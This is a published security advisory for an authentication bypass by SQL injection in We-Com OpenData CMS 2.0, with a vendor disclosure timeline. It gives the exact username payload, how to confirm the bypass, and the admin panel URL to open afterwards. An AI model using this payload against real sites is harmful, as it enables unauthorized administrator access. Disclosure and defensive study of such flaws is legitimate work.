We-Com OpenData CMS 2.0 SQL Injection

2020.06.02

Credit: thelastvvv

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

# Exploit Title: We-com OpenData CMS 2.0 Authentication Bypass / SQL Injection
# Google Dork:N/A
# Date: 2020-04-17
# Exploit Author: @ThelastVvV
# Vendor Homepage: https://www.we-com.it/
# Version: 2.0
# Tested on: 5.5.0-kali1-amd64

---------------------------------------------------------

Vendor contact timeline:

2020-05-05: Contacting vendor through  info@we-com.it
2020-05-26: A Patch is published in the version
2020-06-01: Release of security advisory

Authentication Bypass / SQL Injection in the opendata 2.0 CMS

PoC:

Payload(s)
USERNAME: admin' or '1' = '1'; -- - 

PASSWORD: vvv

the SQL injection attack has resulted in a bypass of the login,to confirm you will get a reponse in header of the page with "okokokokokokokokokokokokokok"

But will not redirect you  to the control panel so you wil need to do it manual 

https://www.site.gov.it/admin/?mod=mod_admin

and we are now authenticated as "adminstrator".

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

We-Com OpenData CMS 2.0 SQL Injection

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.